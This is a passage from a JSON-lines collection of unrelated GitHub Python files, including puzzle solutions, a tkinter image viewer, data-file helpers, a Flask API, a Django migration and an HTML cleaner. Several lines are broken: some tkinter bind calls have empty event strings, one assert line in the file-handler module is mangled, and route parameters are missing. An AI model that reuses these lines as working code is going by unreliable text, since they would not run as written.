enumerate(reversed(b))))\n\n\ndef decimalstr_to_binarystr(d):\n n = []\n intd = int(d)\n while intd > 1:\n intd, r = divmod(intd, 2)\n n.insert(0, str(r))\n n.insert(0, str(intd))\n return ''.join(n)\n\n\n@timer\ndef problem1_solution():\n mask = ''\n mem = {}\n for line in map(lambda x: x.strip(), load_input(14, 1)):\n if line.startswith('mask'):\n mask = line.replace('mask = ', '')\n continue\n # Retrieve address and value in base 10\n addr, decval = line.replace('mem[', '').replace(']', '').split(' = ')\n # Convert value to base 2, fill chars to make its length reach 36\n binval = decimalstr_to_binarystr(decval).zfill(36)\n # Apply mask rules\n newbinval = ''.join(b if m == 'X' else m for b, m in zip(binval, mask))\n # Convert back to base 10, set in memory to its address\n mem[addr] = binarystr_to_decimalstr(newbinval)\n return sum([int(v) for v in mem.values()])\n\n\n@timer\ndef problem2_solution():\n mask = ''\n mem = {}\n for line in map(lambda x: x.strip(), load_input(14, 2)):\n if line.startswith('mask'):\n mask = line.replace('mask = ', '')\n continue\n # Retrieve address and value in base 10\n addr, decval = line.replace('mem[', '').replace(']', '').split(' = ')\n # Convert address to base 2, fill chars to make its length reach 36\n binaddr = decimalstr_to_binarystr(addr).zfill(36)\n # Apply mask rules\n maskedaddr = ''.join(\n b if m == '0' else m if m == '1' else 'X'\n for b, m in zip(binaddr, mask)\n )\n # For each X in the masked address, apply once 0 and once 1 (so, for 2\n # Xs, we'll have 4 possible substitutions: (0, 0), (0, 1), (1, 0),\n # (1, 1), giving 4 different addresses)\n for bits in product(*[(0, 1) for _ in range(maskedaddr.count('X'))]):\n newaddr = maskedaddr.replace('X', '{}').format(*bits)\n # Convert back to base 10, set its value in memory\n mem[binarystr_to_decimalstr(newaddr)] = decval\n return sum([int(v) for v in mem.values()])\n\n\nif __name__ == '__main__':\n print(\"** Solution to problem 1: {} **\".format(problem1_solution()))\n print(\"** Solution to problem 2: {} **\".format(problem2_solution()))\n","repo_name":"SlyK182/AdventOfCode","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13276749179","text":"import os\nimport os.path as osp\nimport cv2\nimport random\nimport numpy as np\n\nimport torch\nimport torch.backends.cudnn as cudnn\n\nfrom configs.vanila_config import cfg\nfrom core.dataset.mpii import MPII_Dataset, prepare_data\nfrom core.models.vanila_vae import VAE\nfrom core.utils.functions import visualize_joints\n\nfrom sklearn.model_selection import train_test_split\n\n\ndef main():\n random_seed = 2020\n random.seed(random_seed)\n np.random.seed(random_seed)\n torch.manual_seed(random_seed)\n torch.cuda.manual_seed(random_seed)\n cudnn.benchmark = cfg.cudnn_benchmark\n torch.backends.cudnn.deterministic = cfg.cudnn_deterministic\n torch.backends.cudnn.enabled = cfg.cudnn_enable\n\n\n total_image, total_annot = prepare_data(cfg)\n train_image, valid_image, train_annot, valid_annot = train_test_split(total_image, total_annot, test_size=0.15, random_state=random_seed)\n\n t_dset = MPII_Dataset(cfg, (train_image, train_annot), train=True)\n v_dset = MPII_Dataset(cfg, (valid_image, valid_annot), train=False)\n\n model = VAE(cfg)\n model.set_dsets((t_dset, v_dset))\n model.set_optim()\n model.gpu_check()\n\n if cfg.load_weights:\n model.load(cfg.weight_path)\n print(\"model loaded.\")\n \n count = 1\n model.eval()\n model.set_loader(model.t_dset, model.cfg.valid_batch, shuffle=False)\n for idx, data in enumerate(model.loader):\n input = data[\"inputs\"].float()\n target = data[\"targets\"].float()\n \n if model.cfg.device == \"cuda\":\n input = input.cuda()\n target = target.cuda()\n \n # with torch.no_grad():\n # preds = model.forward(input)[0]\n \n # preds = preds.detach().cpu().numpy()\n # input = input.detach().cpu().numpy()\n \n # preds = np.where(input==0, preds, input)\n \n img_paths = data['img_path'][0]\n scaler = data['scaler'].detach().cpu().numpy()\n centre = data['centre'].detach().cpu().numpy()\n bboxes = data['bbox'].detach().cpu().numpy()\n\n # preds = preds.reshape(-1, 16, 2)\n # inputs = input.reshape(-1, 16, 2)\n targets = data['targets'].detach().cpu().numpy().reshape(-1, 16, 2)\n\n \n candis = range(len(targets))\n\n for candi in candis:\n img_bgr = cv2.imread(str(img_paths[candi]))\n \n # input_visibility = np.array([\n # 1 if i.all() else 0 for i in inputs[candi]\n # ]).reshape(16, 1)\n \n \n # pred = preds[candi] * scaler[candi] + centre[candi]\n # input = inputs[candi] * scaler[candi] + centre[candi]\n target = targets[candi] * scaler[candi] + centre[candi]\n visibility = np.array([1 for _ in range(len(target))]).reshape(16, 1)\n\n\n # draw joints\n # img_w_pred = visualize_joints(\n # img_bgr, np.concatenate([pred, visibility], axis=-1)\n # )\n\n # img_w_input = visualize_joints(\n # img_bgr, np.concatenate([input, input_visibility], axis=-1)\n # )\n \n img_w_orig = visualize_joints(\n img_bgr, np.concatenate([target, visibility], axis=-1)\n )\n\n # draw bbox\n # img_w_pred = cv2.rectangle(img_w_pred, \n # tuple(bboxes[candi][:2]),\n # tuple(bboxes[candi][2:]), \n # color=(0, 0, 254),\n # thickness=2, \n # lineType=cv2.LINE_AA)\n\n # img_w_input = cv2.rectangle(img_w_input, \n # tuple(bboxes[candi][:2]),\n # tuple(bboxes[candi][2:]), \n # color=(0, 0, 254),\n # thickness=2, \n # lineType=cv2.LINE_AA)\n \n img_w_orig = cv2.rectangle(img_w_orig, \n tuple(bboxes[candi][:2]),\n tuple(bboxes[candi][2:]), \n color=(0, 0, 254),\n thickness=2, \n lineType=cv2.LINE_AA)\n \n # save\n folder = \"train\"\n \n # path = str(model.cfg.root / folder / \"pred\")\n # if not osp.exists(path):\n # os.makedirs(path, exist_ok=True)\n # cv2.imwrite(osp.join(path, f\"{count}_pred.jpg\"), img_w_pred)\n\n # path = str(model.cfg.root / folder / \"input\")\n # if not osp.exists(path):\n # os.makedirs(path, exist_ok=True)\n # cv2.imwrite(osp.join(path, f\"{count}_input.jpg\"), img_w_input)\n\n path = str(model.cfg.root / folder / \"orig\")\n if not osp.exists(path):\n os.makedirs(path, exist_ok=True)\n cv2.imwrite(osp.join(path, f\"{count}_orig.jpg\"), img_w_orig)\n\n count += 1\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"heimish-kyma/filling-the-gap","sub_path":"valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23604334435","text":"import io\nimport tkinter as tk\n\nfrom PIL import Image, ImageTk\n\nfrom module.drag_handler import DraggableWidgetHandler\n\n\nclass ReferenceWindow(tk.Tk):\n def __init__(\n self,\n duration: int,\n image: list[io.BytesIO],\n position: tuple[int, int],\n size: tuple[int, int],\n ):\n super().__init__()\n\n # configure window\n self.attributes(\"-topmost\", True)\n self.focus_force()\n self.overrideredirect(True)\n self.geometry(f\"+{position[0]}+{position[1]}\")\n self.configure(\n bg=\"black\",\n highlightbackground=\"black\",\n highlightcolor=\"black\",\n highlightthickness=2,\n )\n\n # time\n self.duration: int = duration * 60 + 1\n self.paused: bool = False\n self.remaining_time: int = self.duration\n # image\n self.current_image: int = 0 # store which image is currently displayed\n self.position: tuple = position # top-left corner\n self.size: tuple = size\n self.images: int = self.convert(image)\n # misc\n self.timer_update_call = None\n\n # widgets\n self.timer = tk.Label(self) # place holder for the timer\n\n self.picture = tk.Label(\n self,\n bg=\"black\",\n highlightbackground=\"black\",\n image=self.images[self.current_image],\n )\n\n self.cover = tk.Canvas(\n self,\n bg=\"black\",\n border=0,\n highlightbackground=\"white\",\n highlightcolor=\"black\",\n highlightthickness=1,\n )\n\n self.exit_button = tk.Button(\n self,\n bg=\"white\",\n command=self.destroy,\n fg=\"black\",\n font=(\"Small Fonts\", 10, \"bold\"),\n height=1,\n highlightbackground=\"white\",\n highlightcolor=\"black\",\n relief=\"flat\",\n text=\"X\",\n width=2,\n )\n\n self.pause_button = tk.Button(\n self,\n bg=\"white\",\n command=self.pause,\n fg=\"black\",\n font=(\"Small Fonts\", 10, \"bold\"),\n height=1,\n highlightbackground=\"white\",\n highlightcolor=\"black\",\n relief=\"flat\",\n text=\"II\",\n width=2,\n )\n\n # setup the drag handler\n draggable_widgets = [self.picture, self.timer, self.cover]\n self.drag_handler = DraggableWidgetHandler(self, draggable_widgets)\n\n # place widgets on grid\n self.grid_columnconfigure(1, weight=2)\n self.exit_button.grid(row=0, column=2, sticky=\"nesw\", pady=2, padx=2)\n self.pause_button.grid(row=0, column=0, sticky=\"nesw\", pady=2, padx=2)\n self.picture.grid(row=1, column=0, columnspan=3)\n self.timer.grid(row=0, column=1, sticky=\"nesw\")\n\n self.bind(\"\", self.drag_handler.start_move)\n self.bind(\"\", self.drag_handler.do_move)\n self.bind(\"\", self.drag_handler.stop_move)\n # lambda _ to catch the event variabe send by bind\n self.bind(\"\", lambda _: self.destroy())\n self.bind(\"\", lambda _: self.pause())\n\n def convert(self, image: list[io.BytesIO]) -> list[ImageTk.PhotoImage]:\n converted_images = []\n\n for data in image:\n # load and strech the image\n image = Image.open(data)\n ratio = min(self.size[0] / image.width, self.size[1] / image.height)\n new_size = (int(image.width * ratio), int(image.height * ratio))\n image = ImageTk.PhotoImage(image.resize(new_size))\n converted_images.append(image)\n\n return converted_images\n\n def pause(self) -> None:\n self.paused = not self.paused\n\n if self.paused:\n self.after_cancel(self.timer_update_call)\n self.picture.grid_forget()\n self.cover.grid(row=1, column=0, columnspan=3)\n self.cover.configure(\n height=self.picture.winfo_height() - 2,\n width=self.picture.winfo_width() - 2,\n )\n\n else:\n self.cover.grid_forget()\n self.picture.grid(row=1, column=0, columnspan=3)\n self.timer_update_call = self.after(500, self.update_timer)\n\n def update_image(self) -> None:\n self.current_image += 1\n if self.current_image >= len(self.images):\n self.destroy()\n else:\n self.picture.configure(image=self.images[self.current_image])\n\n def update_timer(self) -> None:\n self.remaining_time -= 1\n minutes, seconds = divmod(self.remaining_time, 60)\n self.timer.configure(\n bg=\"white\",\n font=(\"Small Fonts\", 15, \"bold\"),\n highlightbackground=\"black\",\n highlightthickness=2,\n text=f\"{(minutes):02}:{(seconds):02}\",\n )\n\n if self.remaining_time >= 0:\n self.timer_update_call = self.after(1000, self.update_timer)\n else:\n self.after_cancel(self.timer_update_call)\n self.remaining_time = self.duration\n self.update_timer()\n self.update_image()\n\n def run(self) -> None:\n self.update_timer()\n self.mainloop()\n","repo_name":"Undeadamien/photo_reference_app","sub_path":"module/reference_window.py","file_name":"reference_window.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70492687849","text":"\"\"\"\nincrement_version.py\nwritten in Python3\nauthor: C. Lockhart \n\"\"\"\n\n\nimport yaml\n\n# Read in version\nwith open('version.yml', 'r') as f:\n version = yaml.safe_load(f.read())\n\n# Strip \"dev\" out of micro\nversion['micro'] = int(str(version['micro']).replace('dev', ''))\n\n# Update patch\nversion['micro'] += 1\n\n# Add \"dev\" back to patch\nif version['micro'] != 0:\n version['micro'] = 'dev' + str(version['micro'])\n\n# Output version\nwith open('version.yml', 'w') as f:\n yaml.safe_dump(version, f, sort_keys=False)\n\n# Transform version dict to string\nversion = '.'.join([str(version[key]) for key in ['major', 'minor', 'micro']])\n\n# Write version string to pathogen/_version.py\nwith open('pathogen/version.py', 'w') as f:\n f.write(\"__version__ = '{}'\\n\".format(version))\n\n# Return\nprint(version)\n","repo_name":"clockhart/pathogen","sub_path":"_scripts/increment_version.py","file_name":"increment_version.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12037581852","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 21 14:31:11 2023\n\n@author: garya\n\nThis set of routines is used as a standard way to interact with files in \nOpen-FF. \n\nDataframes will typically be stored and read as parquet.\ndefault_file_type = 'parquet'\n\nWhen dataframes need to be shared, such as when they need to be hand curated\nin a spreadsheet, CSV can be generated and read with these routines\n\n\"\"\"\nimport pandas as pd\nimport os\nimport requests\nimport urllib\nfrom openFF.common.handles import curr_data\n\n# this is the list of FF fields that should be treated as text columns in CSV file\nlst_str_cols = ['APINumber','bgCAS','api10','IngredientName','CASNumber','test',\n 'Supplier','OperatorName','TradeName','Purpose',\n 'rawName','cleanName','xlateName', # for companyXlate...\n 'curatedCAS', # in CAS and casing curation files\n ]\n\n\n#### Interacting with files in local situations\n\ndef store_df_as_csv(df,fn,encoding='utf-8',str_lst = lst_str_cols):\n # saves files in standard encoding, and single quote added in front of every value in \n # columns in str_lst, to make them be interpreted as strings by excel (a \"literal\" value)\n t = df.copy()\n for col in str_lst:\n if col in t.columns:\n # print(col)\n t[col] = \"'\"+t[col]\n t.to_csv(fn,encoding=encoding)\n \ndef get_csv(fn,check_zero=True,encoding='utf-8',sep=',',quotechar='\"',\n str_cols = lst_str_cols):\n # check_zero: make sure str fields don't have an abundance of \"'\" in zero position\n dict_dtypes = {x : 'str' for x in str_cols}\n t = pd.read_csv(fn,encoding=encoding, low_memory=False, sep=sep,\n quotechar=quotechar, dtype=dict_dtypes)\n if check_zero:\n for col in str_cols:\n if col in t.columns:\n #print(col)\n test = t[col].str[0]== \"'\" \n assert test.sum() not valid for \"save_df\"')\n assert 1==0\n \ndef get_df(fn,cols=None):\n tup = os.path.splitext(fn)\n if tup[1]=='':\n return pd.read_parquet(fn+'.parquet',columns=cols)\n elif tup[1]=='.csv':\n return get_csv(fn)\n elif tup[1]=='.parquet':\n return pd.read_parquet(fn,columns=cols)\n else:\n print(f'{fn}: Extention <{tup[1]}> not valid for \"get_df\"')\n assert 1==0\n\ndef get_table(repo_dir='', repo_name='current_repo',tname='disclosures',cols=None):\n \"\"\" Used to pull in repo's pickled tables\"\"\"\n return pd.read_parquet(os.path.join(repo_dir,repo_name,'pickles',tname+'.parquet'),\n columns=cols)\n\n##################### Interacting with remote files ##############\n\ndef get_size_of_url_file(url):\n response = requests.head(url,allow_redirects=True)\n return int(response.headers['Content-Length'])\n\ndef fetch_file_from_url(url,fn):\n # get file from url, save it at fn\n sz = get_size_of_url_file(url)\n if sz>100000000: # alert that a large file download is in progress\n print('Fetching file, please be patient...')\n urllib.request.urlretrieve(url,fn)\n\ndef get_df_from_url(df_url,df_fn,force_freshen=False,inp_format='parquet'):\n # get file from url, checking first it it already exists, then convert to dataframe\n if force_freshen:\n fetch_file_from_url(df_url,df_fn);\n else:\n if os.path.isfile(df_fn):\n print('File already downloaded')\n else: \n fetch_file_from_url(df_url,df_fn);\n \n print('Creating full dataframe...')\n assert inp_format=='parquet'\n return pd.read_parquet(df_fn)\n\n#### get specific data sets\n\ndef get_curr_df(curr_data=curr_data,cols=[]):\n # Fetch openFF data frame from the current repository\n if cols!=[]: # not empty so filter\n return pd.read_parquet(curr_data,columns=cols)\n return pd.read_parquet(curr_data) \n\n##### external file dictionary handler\ndef get_ext_master_dic(url=\"https://storage.googleapis.com/open-ff-common/ext_data/ext_data_master_list.csv\"):\n # pulling from main cloud source\n df = get_df(url)\n out = {}\n for i,row in df[df.inc_remote=='Yes'].iterrows():\n out[row.ref_handle] = row.filename\n \n return out\n\ndef ext_fn(ext_dir=\"https://storage.googleapis.com/open-ff-common/ext_data/\",\n handle='state_latlon'):\n masterfn = 'ext_data_master_list.csv'\n if ext_dir[:4] == 'http': # through urls\n ext_dict = get_ext_master_dic(ext_dir+masterfn)\n return ext_dir+ext_dict[handle]\n # through files\n ext_dict = get_ext_master_dic(os.path.join(ext_dir,masterfn))\n return os.path.join(ext_dir,ext_dict[handle])","repo_name":"gwallison/openFF","sub_path":"common/file_handlers.py","file_name":"file_handlers.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26147514235","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CourseTalkWidgetConfiguration',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),\n ('enabled', models.BooleanField(default=False, verbose_name='Enabled')),\n ('platform_key', models.CharField(help_text=\"This key needs to associate CourseTalk reviews with your platform. Better to use domain name Ex: for 'http://edx.org' platform_key will be 'edx'\", max_length=50)),\n ('changed_by', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='Changed by')),\n ],\n options={\n 'ordering': ('-change_date',),\n 'abstract': False,\n },\n ),\n ]\n","repo_name":"analyseuc3m/ANALYSE-v1","sub_path":"openedx/core/djangoapps/coursetalk/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"73655954727","text":"from bs4 import BeautifulSoup, Tag, NavigableString\n\n\ndef has_subsection_style(tag):\n if tag.has_attr('style'):\n if 'overflow:hidden' in tag['style'] and 'width:635px' in tag['style']:\n return True\n return False\n\n\ndef has_article_style(tag):\n if tag.has_attr('style'):\n if 'font-size:12.0pt' in tag['style'] and 'font-weight:bold' in tag['style'] and 'text-decoration:underline' in tag['style']:\n return True\n return False\n\n\ndef cleanse(infile_name: str,\n outfile_name: str,\n theme: str = \"default\"):\n with open(infile_name, \"r\") as file:\n content = file.read()\n soup = BeautifulSoup(content, 'html.parser')\n\n for tag in soup.find_all():\n content = tag.string\n if content is not None:\n content = content.strip()\n if content == '':\n tag.extract()\n\n for tag in soup.find_all(True, {'class': True}):\n if tag.name == \"table\" and tag.get('border') == '1':\n continue\n del tag['class']\n del tag['cellpadding']\n del tag['cellspacing']\n\n for tag in soup.find_all(True, {'bgcolor': True}):\n del tag['bgcolor']\n\n for tag in soup.find_all(True, {'valign': True}):\n del tag['valign']\n\n tags_with_target_style = soup.find_all(has_subsection_style)\n for i, tag in enumerate(tags_with_target_style, start=1):\n parent = tag.find_parent().find_parent()\n new_div = soup.new_tag('div')\n new_div['class'] = 'subsection'\n parent.replace_with(new_div)\n new_div.append(parent)\n\n for div in soup.find_all('div', {'class': 'subsection'}):\n div.parent.unwrap()\n\n subsections = soup.find_all('div', {'class': 'subsection'})\n for index, subsection in enumerate(subsections):\n elems = []\n next_subsection = subsections[index + 1] if index + 1 < len(subsections) else None\n\n for sibling in list(subsection.next_siblings):\n if sibling is next_subsection:\n break\n if isinstance(sibling, NavigableString):\n continue\n elems.append(sibling.extract())\n\n new_div = soup.new_tag('div')\n new_div['class'] = 'section'\n new_div.append(subsection.extract())\n\n for e in elems:\n new_div.append(e)\n\n soup.append(new_div)\n\n tags_with_article_style = soup.find_all(has_article_style)\n for article in tags_with_article_style:\n if article.parent is not None and article.parent.parent is not None:\n article.parent.unwrap()\n\n for section in soup.find_all('div', {'class': 'section'}):\n articles = section.find_all(has_article_style)\n for index, article in enumerate(articles):\n elems = []\n next_article = articles[index + 1] if index + 1 < len(articles) else None\n for sibling in list(article.next_siblings):\n if next_article is not None and sibling in next_article:\n break\n if isinstance(sibling, NavigableString):\n continue\n elems.append(sibling.extract())\n\n # Create new div and append all extracted elements to it\n new_div = soup.new_tag('div') # Create a new div tag\n new_div['class'] = 'article'\n new_div.append(article.extract())\n\n for e in elems:\n new_div.append(e)\n\n section.append(new_div)\n\n for tag in soup.find_all(True, {'style': True}):\n del tag['style']\n\n for tag in soup.find_all('table'):\n tag['border'] = '1'\n\n for tag in soup.find_all('div', {'class': 'article'}):\n span = tag.find('span')\n if span is not None:\n span['style'] = 'font-weight:bold'\n\n soup.find('div').unwrap()\n\n for p in soup.find_all('p'):\n if len(p.contents) == 0:\n p.extract()\n\n for p in soup.find_all('p'):\n if len(p.contents) == 1:\n p.replace_with(p.contents[0])\n\n try:\n with open(outfile_name, \"w\") as file:\n # file.write(soup.prettify().encode('euc-kr', 'ignore').decode('utf-8'))\n file.write(soup.prettify())\n except:\n with open(outfile_name, \"w\") as file:\n file.write(soup.prettify().encode('utf-8', 'surrogatepass').decode('utf-8', 'replace'))\n\n\nif __name__ == \"__main__\":\n ...\n # ! issue (manual fix needed, list of issues below)\n # ! data/cleansed/기타지원.html ** issue\n # ! data/cleansed/임신보육지원.html ** issue\n # ! data/cleansed/청소년청년지원.html ** issue\n\n # cleanse(infile_name=\"data/section/기타지원.html\",\n # outfile_name=\"data/cleansed/기타지원.html\",)\n # cleanse(infile_name=\"data/section/노령층지원.html\",\n # outfile_name=\"data/cleansed/노령층지원.html\",)\n # cleanse(infile_name=\"data/section/법률금융복지지원.html\",\n # outfile_name=\"data/cleansed/법률금융복지지원.html\",)\n # cleanse(infile_name=\"data/section/보건의료지원.html\",\n # outfile_name=\"data/cleansed/보건의료지원.html\",)\n # cleanse(infile_name=\"data/section/보훈대상자지원.html\",\n # outfile_name=\"data/cleansed/보훈대상자지원.html\",)\n # cleanse(infile_name=\"data/section/생계지원.html\",\n # outfile_name=\"data/cleansed/생계지원.html\",)\n # cleanse(infile_name=\"data/section/장애인지원.html\",\n # outfile_name=\"data/cleansed/장애인지원.html\",)\n # cleanse(infile_name=\"data/section/청소년청년지원.html\",\n # outfile_name=\"data/cleansed/청소년청년지원.html\",)\n # cleanse(infile_name=\"data/section/취업지원.html\",\n # outfile_name=\"data/cleansed/취업지원.html\",)\n # cleanse(infile_name=\"data/section/임신보육지원.html\",\n # outfile_name=\"data/cleansed/임신보육지원.html\",)\n","repo_name":"orange-fritters/ai-employee","sub_path":"preprocess/html_related/html_cleanser.py","file_name":"html_cleanser.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5881425457","text":"import sys\nfrom source import scraper\n# sys.path.append('source/')\n# import scraper\n\nweedmaps_json_site = \"https://api-g.weedmaps.com/discovery/v1/listings?filter%5Bbounding_box%5D=33.77115672832914%2C-119.14947509765626%2C34.16977214177208%2C-117.39166259765626&page_size=100&page=1\"\nsource = \"Weedmaps\"\n\nweedmap = scraper.scraper(weedmaps_json_site, source)\nweedmap.parse()\nweedmap.output(\"test\")\n\nprint(\"All Done\")","repo_name":"karlhickel/weedmaps_scraper","sub_path":"my_scrape.py","file_name":"my_scrape.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19527437574","text":"\"\"\"\nThis module runs a server with REST API and responses with the saved data from the provided DB.\n\"\"\"\n\nfrom flask import Flask, jsonify, send_file\nfrom brainstreamer.platforms.databases import DBWrapper\n\nserv = Flask(__name__)\ndb = None\n\n\n# Run the server on the given address using the provided DB\ndef run_api_server(host, port, database_url):\n global db\n db = DBWrapper(database_url)\n serv.run(host, int(port))\n\n\n# Wraps the response with json format and adds an header to it\ndef _wrap_response(data):\n response = jsonify(data)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n\n@serv.route('/users', methods=['GET'])\ndef get_users():\n users = db.get_users()\n users = [{'user_id': user['user_id'], 'username': user['username']} for user in users]\n return _wrap_response(users)\n\n\n@serv.route('/users/')\ndef get_user_by_id(user_id):\n user = db.get_user_by_id(user_id)\n return _wrap_response(user)\n\n\n@serv.route('/users//snapshots')\ndef get_snapshots_by_user_id(user_id):\n snapshots = db.get_snapshots_by_user_id(user_id)\n snapshots = [{'snapshot_id': snapshot['snapshot_id'], 'datetime': snapshot['datetime']}\n for snapshot in snapshots]\n return _wrap_response(snapshots)\n\n\n@serv.route('/users//snapshots/')\ndef get_snapshot_by_id(user_id, snapshot_id):\n snapshot = db.get_snapshot_by_id(user_id, snapshot_id)\n results = list(snapshot['results'].keys())\n return _wrap_response(results)\n\n\n@serv.route('/users//snapshots//')\ndef get_snapshot_result(user_id, snapshot_id, result_name):\n result = db.get_snapshot_by_id(user_id, snapshot_id)['results'][result_name]\n return _wrap_response(result)\n\n\n@serv.route('/users//snapshots///data')\ndef get_snapshot_result_data(user_id, snapshot_id, result_name):\n path = db.get_snapshot_by_id(user_id, snapshot_id)['results'][result_name]['data_path']\n return send_file(path)\n","repo_name":"AllenChikman/brainstreamer","sub_path":"brainstreamer/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16941465298","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by HazzaCheng on 2019-11-02\n\n\nclass Solution:\n def numDistinct(self, s: str, t: str) -> int:\n s_len, t_len = len(s), len(t)\n dp = [1] * (s_len + 1)\n prev = 1\n dp[0] = 0\n\n for i in range(1, t_len + 1):\n for j in range(1, s_len + 1):\n tmp = dp[j]\n if s[j - 1] == t[i - 1]:\n dp[j] = dp[j - 1] + prev\n else:\n dp[j] = dp[j - 1]\n prev = tmp\n prev = 0\n\n return dp[s_len]\n\n","repo_name":"minhhahao/LeetCode","sub_path":"src/main/python/leetcode_by_python/dp/No115_Distinct_Subsequences.py","file_name":"No115_Distinct_Subsequences.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36871287944","text":"import numpy as np\n\nlist1 = [1, 2, 3, 4]\na = np.array(list1)\nprint(a.shape)\n\nb = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])\nprint(b.shape)\n\na = np.zeros((2, 2))\nprint(a)\na = np.ones((2, 3))\nprint(a)\na = np.full((2, 3), 5)\nprint(a)\na = np.eye(3)\nprint(a)\na = np.array(range(20)).reshape((4, 5))\nprint(a)\narray1 = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n]\narray1_re = np.array(array1)\na = np.array(range(10, 19)).reshape(array1_re.shape)\nprint(a)\n\nlst = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n]\narr = np.array(lst)\n\n#슬라이싱\na = arr[0:2, 0:2]\nprint(a)\na = arr[1:, 1:]\nprint(a)\n\nlst = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12]\n]\na = np.array(lst)\ns = a[[0, 1], [1, 3]]\nprint(s)\n\n# s = a[[n1, n2], [n3, n4]]를 입력하면\n# a[n1, n2], a[n3, n4]가 들어가는 것이 아니라\n# a[n1, n3], a[n2, n4]가 들어간다.\n\n\n#boolean 인덱싱\nlst = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n]\na = np.array(lst)\n\nbool_indexing_array = np.array([\n [False, True, False],\n [True, False, True],\n [False, True, False]\n])\n\nn = a[bool_indexing_array]\nprint(n)\n\nlst = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n]\na = np.array(lst)\n\nbool_indexing = (a % 2 == 0)\n\nprint(bool_indexing)\nprint(a[bool_indexing])\nn = a[ a % 2 == 0]\nprint(n)\n\na = np.array([1, 2, 3])\nb = np.array([4, 5, 6])\n\nc = np.add(a, b)\nprint(c)\nc = a + b\nprint(c)\n\nc = np.subtract(a, b)\nprint(c)\nc = a - b\nprint(c)\n\nc = a * b\nprint(c)\nc = np.multiply(a, b)\nprint(c)\n\nc = a / b\nprint(c)\nc = np.divide(a, b)\nprint(c)","repo_name":"heat-of-fusion/test","sub_path":"personal/personal_study/numpy/04_20.py","file_name":"04_20.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39500423999","text":"from rest_framework import mixins, serializers, viewsets\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom ee.api.role import RolePermissions\nfrom ee.models.organization_resource_access import OrganizationResourceAccess\nfrom posthog.api.routing import StructuredViewSetMixin\nfrom posthog.permissions import OrganizationMemberPermissions\n\n\nclass OrganizationResourceAccessSerializer(serializers.ModelSerializer):\n class Meta:\n model = OrganizationResourceAccess\n fields = [\n \"id\",\n \"resource\",\n \"access_level\",\n \"organization\",\n \"created_at\",\n \"updated_at\",\n \"created_by\",\n ]\n read_only_fields = [\"id\", \"created_at\", \"created_by\", \"organization\"]\n\n def validate_resource(self, resource):\n if OrganizationResourceAccess.objects.filter(\n organization=self.context[\"request\"].user.organization,\n resource=resource,\n ).exists():\n raise serializers.ValidationError(\"This resource access already exists.\", code=\"unique\")\n return resource\n\n def create(self, validated_data):\n validated_data[\"organization\"] = self.context[\"request\"].user.organization\n return super().create(validated_data)\n\n\nclass OrganizationResourceAccessViewSet(\n StructuredViewSetMixin,\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.GenericViewSet,\n):\n permission_classes = [\n IsAuthenticated,\n OrganizationMemberPermissions,\n RolePermissions,\n ]\n serializer_class = OrganizationResourceAccessSerializer\n queryset = OrganizationResourceAccess.objects.all()\n","repo_name":"PostHog/posthog","sub_path":"ee/api/organization_resource_access.py","file_name":"organization_resource_access.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"12125829995","text":"Xv = list()\nYv = list()\n\nXv = input('Informe o vetor X: ')\nXsplit = Xv.split()\nX = [int(i) for i in Xsplit]\n\nYv = input('Informe o vetor Y:')\nYsplit = Yv.split()\nY = 